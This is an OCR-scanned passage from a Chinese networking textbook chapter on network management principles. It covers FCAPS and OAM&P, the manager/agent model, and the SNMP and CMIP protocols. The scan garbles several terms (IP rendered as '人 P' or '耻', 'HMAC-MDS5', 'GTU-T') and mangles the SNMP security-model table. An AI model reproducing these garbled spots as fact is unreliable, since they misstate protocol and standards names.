门 的 网 管 系统 ， 随 着 网 络 的 逐渐 融合 ， 网 络 管理 的 一 项 重要 任务 就 是 实现 多 种 类 型 设备 的 
集中 管理 ， 提 供 快速 端 到 端的 解决 能 力 ， 将 所 有 设备 管理 纳入 一 个 统一 的 框架 中 。 


2. 具有 大 规模 网 络 管理 的 能 力 


现代 网 络 规模 ， 尤 其 是 IP 网 络 的 规模 越 来 越 大 。 网 络 结构 通常 可 以 分 为 骨干 层 、 汇 
聚 层 、 接 入 层 。 仅 一 所 综合 型 大 学 就 有 可 能 拥有 上 百 台 甚至 上 千 台 设备 ， 如 此 多 的 设备 必 
然 带 来 两 个 问题 ， 一 个 是 如 何 解 决 单个 网 管 工作 站 的 处 理 问 题 ， 另 一 个 是 如 何 解 决 网 络 管 
理 信 息 的 收敛 问题 。 如 果 设 备 过 多 ， 单 个 网 管 工作 站 仅 就 轮 询 监视 的 功能 就 会 给 工作 站 带 
来 非常 沉重 的 负担 ， 而 且 还 会 造成 大 量 的 网 管 数 据 流 ， 这 些 都 对 当前 网 络 管理 的 框架 和 结 
构 提 出 了 新 的 要 求 。 


3. 缩短 成 本 跨度 


当前 网 络 经 济 进入 微利 时 代 ， 各 类 运营 商 、 企 业 和 用 户 对 建 网 成 本 的 投资 趋 于 理性 ， 
一 个 好 的 网 络 管理 模型 应 充分 考虑 未 来 网 络 的 扩展 性 和 兼容 性 ， 在 系统 升级 和 扩展 时 尽量 
做 到 保护 以 前 的 投资 ， 减 少 成 本 的 跨度 。 


4. 多 厂商 设备 的 管理 


当前 网 络 建设 过 程 中 ， 特 别 是 一 些 大 型 网 络 的 建设 ， 一 般 都 不 会 出 现 一 家 产品 独占 份 
额 的 情况 ， 特 别 是 运营 商 网 络 ， 甚 至 在 其 骨干 网 上 都 使 用 了 几 家 不 同 的 设备 品牌 ， 因 此 网 
络 管理 系统 要 想 更 好 地 实现 网 络 管理 的 目标 ， 就 需要 有 能 力 对 多 厂商 的 设备 进行 统一 
管理 。 

当前 网 络 管理 系统 大 致 可 分 为 以 下 四 类 。 一 是 设备 制造 商 网 管 系统 ， 厂 商 自身 开发 的 
主要 面向 厂商 内 部 设备 管理 支持 的 网 络 与 业务 管理 系统 。 二 是 各 类 通用 的 卫 网 络 管理 系 
统 和 平台 ， 这 些 系统 可 以 完成 基于 各 种 标准 人 P 特性 的 IP 网 络 管理 功能 支持 ， 比 如 自动 拓 
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扑 发 现 ， 二 层 、 三 层 IP 网 络 拓扑 管理 ， 基 本 的 人 P 性 能 、 故 障 管理 等 。 这 些 系统 的 集成 功 
能 都 很 强 ， 很 多 时 候 都 可 以 作为 一 个 系统 集成 平台 来 直接 使 用 。 目前 主流 的 通用 IP 网 络 
管理 系统 有 : CA、OpenView NNM、NetView 等 。 三 是 各 种 专业 的 独立 网 络 与 业务 管理 
软件 ， 这 些 软件 主要 由 独立 软件 开发 商 提 供 ， 系 统 功能 专 一 并 且 功 能 性 很 强 ， 主 要 提供 面 
向 多 厂商 设备 的 专业 管理 功能 支持 。 管 理 领域 可 覆盖 卫 网 络 的 各 个 方面 ， 包 括 性 能 管 
理 、SLA 管理 、 故 障 管理 、 各 种 业务 管理 、 资 源 管 理 等 ， 这 类 系统 有 TCSI、 
Micromuse、Concord、Orchestream 等 。 四 是 运营 商 开 发 的 综合 网 管 系统 ， 可 以 完成 运营 
商 所 需要 的 各 种 人 P 网 络 管理 特性 支持 ， 重 点 在 于 多 厂商 设备 的 综合 管理 支持 。 


10.2.2 ”网 络 管理 相关 概念 和 基本 模型 
. 网 络 管理 的 相关 概念 


管理 站 : 指 能 由 网 络 管理 人 员 直 接 操作 和 控制 的 计算 机 系统 。 

管理 程序 : 用 于 网 络 管理 的 程序 ， 主 要 位 于 管理 站 中 。 

管理 者 (Manager): 这 里 的 管理 者 通常 指 管理 站 或 管理 程序 。 

网 元 (Network Element, NE): 网 络 管理 的 对 象 ， 又 称 被 管 设备 。 网 络 中 的 主机 、 

路 由 器 、 集 线 器 、 调 制 解 调 器 、 协 议 等 都 可 以 是 网 元 。 总 之 ， 网 元 既 包 括 硬件 ， 

也 包括 软件 。 

@ 被 管 对 象 (Managed Object MO): 反应 被 管 设备 实际 特性 的 一 段 管理 信息 。MO 
是 对 网 元 从 各 种 管理 角度 来 看 ， 不 能 再 进一步 分 解 ， 必 须 作为 单个 信息 实体 来 处 
理 的 属性 。MO 可 以 表示 一 个 设备 风扇 以 及 它 的 运行 状态 ， 或 者 表示 线路 卡 上 
的 某 个 端口 以 及 一 系列 统计 数据 ， 又 或 者 表示 的 是 一 个 防火 墙 规则 。 

e@ 管理 信息 库 (Management Information Base, MIB): 网 元 向 管理 系统 输出 的 所 有 管 
理 信息 的 集合 。MIB 是 一 种 概念 性 的 数据 库 ， 其 中 包含 了 一 个 被 管 设 备 的 管理 
视图 。 和 真实 的 数据 库 不 同 ，MIB 与 它 所 表示 的 设备 是 相关 联 的 。MIB 中 的 管 
理 信 息 代表 了 实际 资源 ， 与 静态 的 信息 项 相 比 ， 这 些 实际 资源 在 通信 网 络 中 具有 
各 自 的 功能 和 不 同 状态 ， 当 修改 MIB 中 的 信息 来 进行 特定 的 更 新 操作 时 ， 其 效 
果 会 在 实际 设备 上 体现 出 来 。 

@ ”代理 (Agent): 同 管理 者 一 样 ， 是 表示 一 种 角色 的 名 词 ， 指 代 帮 助 执行 与 计算 机 
相关 的 任务 。 

e@ 网管 代 理 : 网 元 中 用 于 帮助 管理 程序 执行 与 网 络 管理 相关 任务 的 部 分 。 显 然 ， 网 
管 代理 与 管理 者 之 间 需 要 进行 通信 。 

@ 网 络 管理 协议 (Network Management Protocol): 管理 者 与 网 管 代理 之 间 的 通信 

规则 。 


2. 网 络 管理 的 基本 模型 


现代 网 络 通常 都 是 一 个 复杂 的 分 布 式 系统 ， 网 络 中 的 节点 运行 着 各 种 协议 ， 节 点 之 间 
也 会 采用 不 同 的 通信 方式 进行 数据 的 交换 ， 因 此 网 络 的 状态 始终 处 于 动态 的 变化 中 。 为 了 
使 网 络 能 正常 工作 ， 就 必须 对 其 进行 必要 的 管理 ， 而 这 种 管理 又 必须 通过 网 络 形式 来 实 


hs 
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现 。 从 理论 上 而 言 ，MIB 库 并 不 依赖 于 任何 特定 的 网 络 管理 协议 ， 但 实际 上 不 同 的 网 络 管 
理 协 议 需要 它们 各 自 特 定 的 方式 来 呈现 被 管 设备 的 视图 ， 从 而 得 到 各 自 特定 的 MIB 实 
现 。 在 网 络 管理 中 ， 一 般 采 用 管理 者 /代理 模型 ， 如 图 10-3 所 示 。 该 模型 的 核心 是 一 组 相 
互通 信 的 管理 实体 ， 一 个 系统 的 管理 进程 担当 着 管理 者 的 角色 ， 而 另 一 个 系统 中 的 对 等 实 
体 担当 代理 的 角色 ， 代 理会 负责 提供 对 被 管 对 象 的 访问 。 因 此 ， 前 者 也 被 称 为 网 络 管理 
者 ， 后 者 则 被 称 为 网 管 代 理 。 


网 络 管理 协议 i 


管理 系统 被 管 系统 
管理 操作 


管理 者 | 网管 代理 了 | | 被 管 次 浙 


响应 /通告 


图 10-3 ”网络 管理 基本 模型 示意 图 


无 论 是 OSI 的 网 络 管理 ， 还 是 IETF 的 网 络 管理 ， 都 认为 现代 计算 机 网 络 管理 系统 
的 4 个 基本 要 素 为 网 络 管理 者 、 网 管 代理 、MIB 和 网 络 管理 协议 。 

一 般 地 ， 各 种 网 络 管理 的 指令 是 由 网 路 管理 者 发 出 的 ， 它 通过 各 个 网 络 代理 者 对 设备 
和 资源 进行 实时 的 监测 和 控制 。 网 管 代理 则 负责 执行 这 些 管理 指令 ， 并 以 通知 的 形式 将 被 
管 对 象 发 生 的 一 些 重要 事件 反馈 给 网 络 管理 者 。 网 管 代 理 具有 两 个 基本 功能 : 

e ”从 MIB 库 中 读 取 各 种 变量 ; 

@ ”修改 MIB 库 中 的 变量 值 。 

MIB 库 通常 由 各 种 管理 对 象 构成 ， 各 个 网 管 代 理 管理 着 MIB 库 中 属于 本 地 的 管理 对 
象 ， 全 网 的 MIB 库 则 最 终 由 这 些 网 管 代理 控制 的 管理 对 象 共 同 组 成 。 网 络 管理 协议 是 模 
型 中 最 重要 的 部 分 之 一 ， 它 定义 了 网 络 管理 者 与 网 管 代理 间 的 通信 方法 和 规则 ， 同 时 规定 
了 管理 信息 库 的 存储 结构 、 信 息 库 中 关键 词 的 含义 以 及 各 种 事件 的 处 理 方法 。 另 外 在 模型 
中 ， 管 理 者 角色 与 代理 角色 并 不 是 固定 的 ， 而 是 由 每 次 通信 的 性 质 所 决定 的 。 当 管理 者 角 
色 的 进程 向 担当 代理 角色 的 进程 发 出 操作 请 求 时 ， 担 当代 理 角色 的 进程 对 被 管 对 象 进行 操 
作 和 将 被 管 对 象 发 出 的 通告 传 向 管理 者 角色 的 进程 。 


10.2.3 ”网 络 管理 功能 和 参考 模型 

在 网 络 管理 功能 参考 模型 中 ，FCAPS 模型 和 OAM&P 模型 是 占据 最 主导 地 位 的 两 种 
参考 模型 。 

1. FCAPS 模型 

FCAPS 模型 是 由 国际 标准 化 组 织 ISO) 和 国际 电信 联盟 电信 标准 化 部 门 GTU-T) 定 义 在 
M.3400 规范 中 的 一 种 网 络 管理 功能 模型 ， 该 模型 适用 于 所 有 网 络 。 在 CCITT 应 用 中 的 开 
放 系 统 互 连 (OSD 的 管理 框架 中 ， 其 管理 需求 被 划分 为 故障 、 配 置 、 统 计 、 人 性 能 、 安 全 
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(Fault, Configuration,Accounting, Performance, Security; FCAPS) 这 5 个 管理 功能 域 。 

1) ”故障 管理 

为 了 保证 开放 网 络 系统 实现 它们 的 运营 目标 ， 必 须 及 时 地 进行 故障 管理 。 故 障 管理 通 
常 包含 了 确保 网 络 正 常 工作 的 一 些 必 要 监控 和 恢复 功能 。 根 据 X.700， 故 障 管理 包括 的 功 
能 有 : 维护 和 检查 错误 日 志 、 接 收 错误 检测 通知 并 采取 措施 、 跟 踪 和 识别 故障 、 完 成 诊断 
测试 序列 、 消 除 故 障 。 

2) ”配置 管理 

配置 管理 包含 的 功能 通常 有 : 设置 用 于 控制 ON 系统 日 常 运作 的 参数 ， 将 名 字 与 被 
管 对 象 以 及 被 管 对 象 集合 相关 联 ， 初始 化 被 管 对 象 和 关闭 被 管 对 象 ， 按 需 收集 关于 ON 
系统 现状 的 信息 ; 能 从 管理 员 处 获取 ON 系统 状态 发 生 重大 变化 的 通知 ; 能 对 当前 的 配 
置 进行 评价 ， 更 改 系统 的 配置 。 配 置 管理 通常 考虑 网 络 如 何 配置 ， 来 保证 网 络 能 够 提供 预 
期 的 服务 。 

3) ”统计 管理 

统计 管理 负责 收集 和 记录 有 关 网 络 的 使 用 情况 以 及 终端 用 户 所 消耗 的 资源 情况 。 通 过 
统计 管理 ， 服 务 提供 商 能 够 获得 收入 情况 的 反馈 ， 并 且 对 网 络 所 产 出 的 价值 进行 量化 对 
比 ， 因 此 ， 统 计 管理 通常 和 计 费 并 联 在 一 起 ， 后 者 实际 上 包含 于 前 者 中 。 

统计 管理 通常 包括 的 功能 有 : 通知 用 户 需 担负 的 费用 或 已 消耗 的 资源 ， 能 够 设 定 计 费 
限度 、 使 用 资源 的 价格 表 及 相应 的 费用 核算 ， 当 调用 多 种 资源 完成 某 个 特定 的 功能 时 ， 能 
够 汇总 出 综合 成 本 ; 另外 ， 可 根据 时 间 单 位 统计 出 网 络 系统 的 利用 率 。 

4) ”性 能 管理 

性 能 管理 可 根据 从 网 络 收集 到 的 统计 数据 来 评估 网 络 性 能 ， 并 对 网 络 做 进一步 的 优 
化 。 性 能 管理 的 主要 目的 是 为 了 使 网 络 资源 得 到 合理 分 配 ， 例 如 消除 瓶颈 ， 为 网 络 规划 提 
供 预测 信息 ， 并 且 尽 可 能 提供 最 佳 的 服务 质量 。 性 能 管理 包括 的 功能 有 : 收集 统计 信息 、 
维护 和 检查 系统 状态 的 历史 记录 、 智 能 评估 、 在 自然 和 人 为 条 件 下 决定 系统 性 能 、 为 开展 
性 能 管理 活动 改变 系统 运作 模式 。 

(5) 安全 管理 

安全 管理 涉及 管理 网 络 中 与 安全 有 关 的 各 个 方面 ， 其 目的 是 有 效 避 免 网 络 和 网 络 管理 
基础 设施 遭受 各 种 安全 威胁 。 安 全 管理 可 按照 一 定 的 策略 来 控制 对 网 络 资源 的 访问 ， 以 保 
证 网 络 不 被 侵害 ， 并 保证 重要 的 信息 不 被 未 授权 的 用 户 访问 ， 同 时 保证 网 络 管理 系统 本 身 
不 被 非法 访问 。 

2. OAM&P 模型 


OAM&P 是 指 运营 、 管 理 、 维 护 和 供应 (Operation, Administration, Maintenance, 
Provisioning.OAM&P)， 它 是 由 服务 供应 商 提 出 的 一 种 针对 电信 网 络 的 功能 模型 由 于 
OAM&P 模型 通常 要 比 FCAPS 模型 能 更 好 地 反映 这 些 电信 服务 提供 商 的 内 部 结构 ， 因 此 
受到 了 大 型 电信 服务 提供 商 的 青睐 。 而 FCAPS 模型 更 常见 于 企业 和 数据 提供 商 的 网 络 管 
理 中 。 

OAM&P 模型 中 各 个 类 别 涉及 的 管理 功能 如 下 。 
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1) ”运营 模块 

运营 模块 一 般 涉及 的 是 网 络 的 日 常 运营 任务 ， 还 包括 监控 网 络 来 确保 它 正 常 运行 。 尽 
管 在 许多 情况 下 ， 监 控 活动 也 被 作为 维护 过 程 的 一 部 分 而 进行 。 这 也 进一步 说 明了 任何 功 
能 分 类 方式 都 多 少 有 些 随意 性 ， 而 且 不 同 的 网 络 提供 商 各 自 最 适用 的 管理 功能 组 织 方式 也 
有 所 差异 。 

2) ”管理 模块 

管理 模块 负责 管理 网 络 所 需要 的 辅助 支持 功能 ， 以 及 那些 不 涉及 执行 修改 (配置 、 调 
整 ) 操 作 来 运行 网 络 的 辅助 支持 功能 ， 包 括 诸如 设计 网 络 、 追 踪 网 络 使 用 情况 、 分 配 地 
址 、 规 划 网 络 升级 、 从 终端 用 户 和 客户 获取 服务 订单 、 追 踪 网 络 库存 信息 、 收 集 统计 数据 
以 及 客户 计 费 等 活动 。 

3) ”维护 模块 

维护 模块 主要 包括 确保 网 络 和 通信 服务 能 够 按照 预期 要 求 来 工作 的 功能 ， 涉 及 故障 诊 
断 、 故 障 排除 ， 及 修复 那些 不 能 按照 计划 工作 的 设备 ， 使 网 络 始终 保持 一 种 能 够 持续 使 用 
并 提供 合适 服务 的 状态 。 

4) “供应 模块 

供应 模块 负责 正确 设置 网 络 上 的 配置 参数 ， 使 网 络 能 够 发 挥 预期 的 功能 。 根 据 供应 内 
容 的 不 同 ， 供 应 可 以 分 为 不 同 的 类 型 。 例 如 设备 供应 考虑 的 是 更 新 设备 配置 参数 ， 并 且 安 
装 和 启用 设备 。 而 服务 供应 则 考虑 的 是 配置 网 络 端 到 端 连接 ， 按 照 合 适 的 服务 等 级 来 为 客 
户 提供 或 禁用 某 个 服务 。 


10.2.4 ”网络 管理 的 通信 模式 
1. 网 络 管理 的 通信 层次 


网 络 管理 的 通信 过 程 和 所 有 网 络 系统 通信 一 样 ， 也 是 划分 为 不 同 层次 的 ， 单 赁 网 络 管 
理 协议 本 身 不 足以 建立 起 管理 者 和 代理 之 间 的 互 操作 性 ， 以 及 描述 它们 之 间 的 交互 过 程 。 
网 络 管理 协议 也 需要 位 于 其 下 各 层 的 支持 。 

通常 ， 网 络 管理 协议 被 认为 处 于 应 用 层 协议 族 中 ， 其 下 一 层 通常 为 传输 层 ， 因 此 网 络 
管理 协议 是 基于 某 种 传输 层 协 议 支持 的 ， 而 传输 层 协议 则 依赖 于 更 底层 的 协议 支持 ， 如 
图 10-4 所 示 。 


应 用 层 “| -系统 管理 协议 | 。 应 用 层 


图 10-4 ”网络 管理 的 通信 层次 示意 图 
位 于 应 用 层 的 网 络 管理 协议 提供 用 于 被 管 对 象 的 监测 、 控 制 和 协商 的 机 制 。 
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2. 管理 者 和 代理 之 间 的 交互 模式 


在 管理 网 络 时 ， 管 理 者 和 其 所 管辖 的 网 管 代理 之 间 一 般 存 在 以 下 两 种 基本 通信 模式 。 
1) ”基于 轮 询 的 交互 模式 
基于 轮 询 的 管理 通常 是 由 管理 者 发 起 的 交互 过 程 ， 是 一 种 请 求 /响应 式 交互 类 型 ， 管 
理 者 依赖 定期 的 请 求 和 响应 来 监控 网 络 状态 。 
2) ”基于 事件 的 交互 模式 
基于 事件 的 管理 通常 是 由 代理 端 发 起 的 交互 过 程 ， 在 这 个 过 程 中 ， 代 理发 起 通信 过 
程 ， 并 向 管理 者 发 送 一 个 事件 消息 ， 管 理 者 依赖 代理 自动 发 送 过 来 的 事件 消息 来 监控 网 络 
状态 。 
通常 根据 目的 的 不 同 ， 事 件 被 分 为 不 同 的 类 别 进行 管理 ， 最 常见 的 几 种 类 别 如 下 
所 示 : 
e ”警报 一 一 非 预期 事件 ， 通 常 表 明 需 要 引起 管理 者 注意 的 一 类 事件 。 
更 新 一 一 通常 是 通告 在 设备 上 的 某 个 配置 被 修改 的 一 类 事件 。 
e ” 越 限 一 一 通常 用 于 警告 某 个 与 性 能 指标 有 关 的 变量 已 经 超出 了 预先 设 定 的 阔 值 的 
一 类 事件 ， 这 种 状况 的 出 现 警告 管 理 者 需要 预防 网 络 和 服务 的 阻塞 。 
e 日志 一 一 用 于 记录 日 常 发 生 的 预期 事件 ， 通 过 这 类 事件 可 以 让 管理 者 充分 了 解 当 
前 网 络 中 所 发 生 的 一 切 活动 和 情况 。 
从 用 户 角度 ， 上 述 两 种 方式 所 呈现 的 结果 基本 上 是 等 效 的， 但 基于 事件 模式 的 交互 机 
制 一 般 来 说 更 有 效率 ， 而 且 可 伸缩 性 好 。 


10.3 ”网 络 管理 相关 协议 


本 节 将 主要 介绍 两 种 网 络 管理 相关 协议 SNMP 协议 和 CMIP 协议 ， 重 点 学 习 SNMP 
协议 的 一 些 基 本 知识 和 原理 。 


10.3.1 SNMP 协议 和 CMIP 协议 概述 
1. SNMP 协议 


SNMP 是 由 一 系列 协议 和 规范 组 成 的 ， 它 们 提供 了 一 种 从 网 络 设备 中 收集 网 络 管理 信 
息 的 方法 ， 目 前 SNMP 已 经 成 为 事实 上 的 标准 网 络 管理 协议 。SNMP 是 起 初 由 IETF 研究 
小 组 为 了 解决 在 Intermet 上 的 路 由 器 管理 问题 提出 的 ， 后 来 发 展 成 为 一 种 简单 网 络 管理 协 
议 。SNMP 可 以 在 耻 、IPX、AppleTalk、OSI 以 及 其 他 协议 上 使 用 ， 因 此 具有 良好 的 协议 
无 关 性 。 

SNMP 协议 在 体系 结构 上 存在 两 种 类 型 的 角色 : SNMP 管理 者 (SNMP Manager) 和 
SNMP 代理 者 (SNMP Agent)。 每 个 支持 SNMP 的 网 络 设备 中 都 会 包含 一 个 代理 ， 此 代理 
可 以 随时 记录 网 络 设备 的 各 种 运行 状态 ， 网 络 管理 程序 可 以 通过 SNMP 通信 协议 查询 或 
修改 代理 所 记录 的 信息 。 

SNMP 协议 通常 采用 两 种 收集 数据 的 方法 : 一 种 是 轮 询 (Polling-Only) 法 ， 另 一 种 是 基 
于 中 断 (Interrupt-Based) 的 方法 。 它 通过 使 用 嵌入 到 网 络 设施 中 的 代理 软件 来 收集 网 络 的 通 
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信 信 息 和 有 关 网 络 设备 的 统计 数据 。 代 理 软件 不 断 地 收集 统计 数据 ， 并 把 这 些 数据 记录 到 
一 个 管理 信息 库 (MIB) 中 。 网 络 管理 者 可 以 通过 向 代理 的 MIB 发 出 查询 信号 得 到 这 些 信 
息 ， 这 个 过 程 被 称 为 轮 询 (Polling)。 为 了 能 全 面 地 查看 一 天 的 通信 流量 和 变化 率 ， 管 理 管 
理 者 必须 定期 轮 询 SNMP 代理 ， 这 样 就 可 以 使 用 SNMP 来 评价 网 络 的 运行 状况 了 。 轮 询 
的 缺陷 主要 集中 在 对 信息 的 实时 性 上 ， 尤 其 是 错误 的 实时 性 。 其 中 轮 询 的 间隔 非常 重要 ， 
轮 询 的 间隔 太 小 ， 会 产生 太 多 不 必要 的 通信 量 ;而 间隔 太 大 ， 则 对 于 一 些 大 的 灾难 性 事件 
的 通知 又 会 太 慢 ， 这 违背 了 积极 主动 的 网 络 管理 目的 。 与 之 相 比 ， 当 有 异常 事件 发 生 时 ， 
基于 中 断 的 方法 可 以 立即 通知 网 络 管理 工作 站 ， 实 时 性 很 强 。 但 这 种 方法 也 有 缺陷 ， 产 生 
错误 或 自 陷 需 要 消耗 系统 资源 。 如 果 自 陷 必须 转发 大 量 的 信息 ， 那 么 被 管理 设备 可 能 不 得 
不 消耗 更 多 的 事件 和 系统 资源 来 产生 自 陷 ， 这 将 会 影响 到 网 络 管理 的 主要 功能 。 


2. CMIP 协议 


CMIP 协议 是 由 ISO 组 织 制定 的 一 种 公共 管理 信息 协议 ， 作 为 一 种 国际 标准 ， 它 更 着 
重 于 普 适 性 。 

在 网 络 管理 过 程 中 ，CMIP 主要 针对 OSI 七 层 协议 模型 的 传输 环境 来 设计 的 ， 它 不 是 
通过 轮 询 而 是 通过 事件 报告 进行 工作 的 ， 网 络 中 各 种 设备 在 发 现 被 检测 设备 的 状态 和 参数 
发 生变 化 后 ， 会 及 时 向 管理 进程 发 送 事件 报告 。 而 管理 进程 一 般 都 会 对 事件 进行 分 类 ， 根 
据 事件 发 生 时 对 网 络 服务 影响 的 大 小 来 进一步 划分 事件 的 严重 等 级 。 

与 SNMP 相 比 ，CMIP 是 一 个 更 为 有 效 的 网 络 管理 协议 ， 它 将 更 多 的 工作 交付 给 管理 
者 去 做 ， 减 轻 了 终端 用 户 的 工作 负担 。 此 外 ，CMIP 建立 了 安全 管理 机 制 ， 提 供 授权 、 访 
问 控制 、 安 全 日 志 等 功能 。 但 由 于 CMIP 是 由 国际 标准 组 织 指定 的 国际 标准 ， 因 此 涉及 面 
很 广 ， 实 施 起 来 比较 复杂 且 花 费 较 高 ， 并 且 对 CPU 和 内 存 的 要 求 相 对 较 高 ， 目 前 支持 它 
的 产品 较 少 。 


10.3.2 SNMP 协议 基础 知识 


SNMP(Simple Network Management Protocol) 协议 是 一 种 目前 被 广泛 接受 ， 并 符合 工 
业 标 准 的 简单 网 络 管理 协议 ， 它 的 目标 是 保证 管理 信息 的 获取 和 转发 ， 便 于 网 络 管理 员 在 
网 络 上 的 任何 节点 都 可 以 检索 到 网 络 运行 状态 信息 ， 并 进行 诸如 修改 配置 、 寻 找 故 障 、 故 
障 诊断 、 容 量规 划 和 报告 生成 等 工作 。 应 用 中 ， 它 一 般 采 用 轮 询 机 制 ， 提 供 最 基本 的 功能 
集 ， 适 合 在 中 小 型 、 快 速 的 网 络 环境 中 使 用 。SNMP 位 于 协议 栈 中 的 应 用 层 ， 并 且 基 于 传 
输 层 协议 UDP 进行 工作 ， 受 到 了 许多 产品 的 广泛 支持 。 

1. SNMP 各 版 本 的 特点 


SNMPv1 是 SNMP 协议 的 第 一 个 正式 协议 版 本 ， 在 RFC1157 中 定义 ， 它 只 实现 了 简 
单 的 网 络 管理 功能 ， 而 在 安全 性 上 存在 很 大 缺陷 。 

SNMPv2C 是 基于 共同 体 (Community-based) 的 SNMPv2 管理 架构 , 在 RFC1901 中 定义 
的 一 个 实验 性 协议 。 

SNMPv3 是 通过 对 数据 进行 鉴别 和 加 密 ， 并 提供 了 诸多 安全 特性 ， 在 各 种 SNMP 版 
本 中 ， 它 的 安全 性 是 最 高 的 。 
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在 这 三 种 版 本 的 SNMP 协议 中 ，SNMPv1 和 SNMPv2C 都 采用 了 基于 共同 体 
(Community-based) 的 安全 架构 。 这 种 架构 可 以 通过 主机 地 址 和 认证 名 (Commumity string) 
来 控制 哪些 管理 者 有 权限 对 代理 的 MIB 库 进 行 操作 。SNMPv2C 采用 GetBulk 的 机 制 ， 能 
够 一 次 性 地 获取 表格 中 所 有 信息 或 者 大 部 分 信息 ， 从 而 减少 “请 求 一 响应 ”的 次 数 ， 利 用 
GetBulk 机 制 还 可 以 让 管理 工作 站 获取 更 加 详细 的 错误 信息 类 型 ，SNMPv2C 错误 处 理 能 
力 的 提高 还 体现 在 包括 扩充 错误 代码 以 区 分 不 同类 型 的 错误 上 ， 而 在 SNMPv1 中 ， 这 些 
错误 仅 有 一 种 代码 表示 ，SNMPv2C 可 以 通过 错误 代码 分 类 来 更 加 详细 地 区 分 各 种 错误 。 
目前 因为 网 络 上 存在 着 既 支 持 SNMPv1 的 工作 站 ， 也 同时 存在 着 SNMPv2C 的 管理 工作 
站 ， 因 此 要 求 SNMP 代理 必须 能 够 同时 识别 SNMPv1 和 SNMPv2C 的 报 文 ， 并 且 能 够 返 
回 相应 版 本 的 报 文 。 

SNMPv3 则 在 SNMPv2C 的 基础 上 ， 通 过 安全 模型 以 及 安全 级 别 来 确定 对 数据 采用 哪 
种 安全 机 制 进行 处 理 ， 以 下 是 SNMPv3 主要 的 一 些 安全 特性 设计 

@ ”确保 数据 在 传输 过 程 中 不 被 算 改 。 

@ ”确保 数据 从 合法 的 数据 源 发 出 。 

@ ”加 密 报 文 ， 确 保 数据 的 机 密 性 。 

目前 可 用 的 安全 模型 有 SNMPv1、SNMPv2C 和 SNMPv3 这 三 种 类 别 ， 表 10-2 对 这 
三 种 可 用 的 安全 模型 进行 了 一 个 简单 的 对 比 。 


表 10-2 SNMP 协议 三 种 安全 模型 的 比较 


安全 模型 | 安全 级 别 | 鉴别 | 加 密 | 说 明 
SNMPv1 | noAuthNoPriv | 认证 名 通过 认证 名 确认 数据 的 合法 性 


SNMPV2C | noAuthNopriv 通过 认证 名 确认 数据 的 合法 性 
SNMPv3 | noAuthNoPriv 通过 用 户 名 确认 数据 的 合法 性 


SR i 1 [sa | eA | 国 P HMAC-MDS5 或 者 HMAC-SHA 
上 
Bi 的 数据 鉴别 机 制 


提供 基于 HMAC-MDS5 或 者 HMAC-SHA 
SNMPv3 authPriv MD5 或 者 SHA 的 数据 鉴别 机 制 ， 提 供 基于 CBC-DES 的 
数据 加 密 机 制 


2. SNMP 协议 的 优势 


SNMP 协议 目前 应 用 范围 非常 广泛 ， 各 类 网 络 设备 、 软 件 和 系统 中 都 有 所 采用 ， 已 经 
成 为 事实 上 的 一 种 工业 化 标准 ，SNMP 协议 之 所 以 受到 如 此 的 青睐 ， 主 要 是 因为 它 具 有 以 
下 几 个 显著 的 特点 。 

1) ”SNMP 协议 的 简单 性 

相对 于 其 他 网 络 管理 体系 或 协议 来 讲 ，SNMP 协议 简单 易 行 ， 可 操作 性 强 ， 易 于 实 
现 ， 所 以 SNMP 的 管理 协议 、MIB 库 和 其 他 相关 的 体系 框架 能 够 在 各 种 不 同类 型 的 设备 
上 运行 ， 包括 从 低档 的 个 人 PC 到 高 档 的 大 中 型 服务 器 ， 以 及 服务 器 、 交 换 机 、 路 由 器 等 
各 种 网 络 设备 。 


第 10 章 ”网络 管理 原理 351 


2) ”SNMP 协议 的 高 效 性 

SNMP 协议 是 一 系列 协议 族 和 协议 规范 的 集合 ， 它 们 为 SNMP 协议 规定 了 从 网 络 设 
备 中 收集 网 络 管理 信息 的 手段 和 方法 ， 并 且 经 过 长 期 的 实践 应 用 ，SNMP 协议 运行 起 来 更 
加 高 效 。 一 个 SNMP 代理 组 件 在 运行 时 不 需要 很 大 的 内 存 空 间 ， 因 此 对 运行 主机 的 计算 
能 力也 就 要 求 不 高 ， 另 外 SNMP 协议 一 般 可 以 从 目标 系统 中 快速 开发 出 来 ， 所 以 它 很 容 
易 移植 到 新 产品 中 。 

3) ”SNMP 协议 的 开放 性 

SNMP 协议 是 开放 的 产品 ， 只 有 经 过 IETF 的 标准 批准 才 可 以 改动 SNMP 协议 ; 
SNMP 协议 成 为 各 个 厂商 共同 遵循 的 一 个 工业 标准 ， 因 此 SNMP 协议 可 用 于 控制 各 种 设 
备 ， 例 如 电话 系统 、 环 境 控制 系统 以 及 一 些 非 传 统 的 可 入 网 设备 ， 另 外 ，SNMP 协议 也 有 
很 多 详细 的 文档 资料 ， 网 络 业 界 对 该 协议 已 经 有 了 非常 深入 的 理解 ， 这 些 都 为 SNMP 协 
议 的 进一步 发 展 和 改进 葛 定 了 基础 。 

虽然 SNMP 协议 并 非 十 全 十 美 ， 但 它 设计 简单 、 扩 展 灵 活 、 易 于 使 用 等 特点 足以 弥 
补 和 掩盖 SNMP 协议 与 其 他 网 络 管理 协议 间 相 比 存在 的 不 足 。 


3. 管理 信息 库 MIB 


前 面 我 们 说 过 ，SNMP 协议 要 通过 查询 或 修改 被 管 设备 MIB 库 中 的 变量 来 达到 监测 
和 控制 某 个 网 元 对 象 的 目的 ， 那 么 MIB 库 中 的 这 些 变量 是 如 何 组 织 的 呢 ? 它们 与 实际 的 
管理 对 象 实例 又 有 什么 关系 呢 ? 要 回答 这 些 问题 ， 我 们 就 需要 了 解 OID 和 MIB 的 概念 ， 
这 样 才能 更 好 地 理解 SNMP 协议 。 

1) ”SNMP 协议 的 对 象 识别 符 OID 

简单 地 说 ， 一 个 对 象 识别 符 ( 简 称 OID) 就 代表 一 个 具体 含义 的 变量 ， 它 与 网 络 中 某 个 
实际 的 管理 对 象 实例 之 间 形 成 一 对 一 的 映射 关系 ， 它 的 格式 为 一 系列 用 “.” 分 割 的 数字 
序列 ， 例 如 1.3.6.1.4.1.2021.13.15.1.1.1 就 是 一 个 OID， 它 实际 上 代表 了 设备 磁盘 IO 的 某 
项 性 能 参数 变量 的 名 称 ， 向 设备 发 送 对 1.3.6.1.4.1.2021.13.15.1.1.1 这 个 变量 的 SNMP 请 
求 ， 就 可 以 获取 这 个 设备 的 某 项 性 能 参数 的 描述 信息 。 

设备 的 OID 一 般 分 为 两 种 变量 : 简单 变量 和 表 变 量 。 简 单 变量 一 般 是 一 个 变量 对 应 
